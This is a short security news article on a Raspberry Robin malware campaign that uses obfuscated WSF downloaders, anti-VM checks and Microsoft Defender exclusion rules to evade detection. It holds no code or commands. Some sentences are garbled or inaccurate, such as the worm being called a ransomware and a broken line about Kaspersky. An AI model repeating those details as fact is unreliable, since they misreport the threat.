Cybersecurity researchers have discovered a new wave of Raspberry Robin activity that delivers malware via malicious Windows Script Files (WSF) since March 2024.
HP Wolf Security researcher Patrick Schläpfer said in a report shared with The Hacker News: “Historically, Raspberry Robin has been known to spread via removable media such as USB hard drives, but over time, its resellers have tried other initial infection vectors.”
The Raspberry Robin, also known as the QNAP worm, was first discovered in September 2021 and has evolved in recent years to become a downloader of various other payloads, such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and is also a ransomware.
While the malware was initially distributed via USB devices containing LNK files that retrieved payloads from infected QNAP devices, it has since adopted other methods such as social engineering and malvertising.
This is attributed to an emerging threat cluster called Storm-0856 that Microsoft is tracking, which has ties to the broader cybercriminal ecosystem, including groups such as Evil Corp, Silence, and TA505.
The latest distribution vectors require the use of WSF files that can be downloaded through various domains and subdomains.
It is unclear how the attackers directed victims to these URLs, but it is suspected to be through spam or malvertising campaigns.
The heavily obfuscated WSF file acts as a downloader, using the curl command to retrieve the main DLL payload from a remote server, but not before performing a series of anti-analysis and anti-VM evaluations to determine if it is running. Virtualized environment.
It can also terminate execution and Kaspersky if the Windows operating system has a build number lower than 17063 (released in December 2017) and the list of executing processes contains antivirus processes related to Avast, Avira, Bitdefender, Check Point, ESET .
In addition, it configures Microsoft Defender antivirus exclusion rules to avoid detection by adding the entire primary drive to the exclusion list and preventing it from being scanned.
“The scripts themselves are not currently classified as malicious by any virus scanner on VirusTotal, indicating that the malware is evasive and has the potential to cause serious infections on Raspberry Robin,” HP said.
“The WSF downloader is heavily obfuscated and uses many analysis techniques, allowing the malware to evade detection and slow down analysis.”
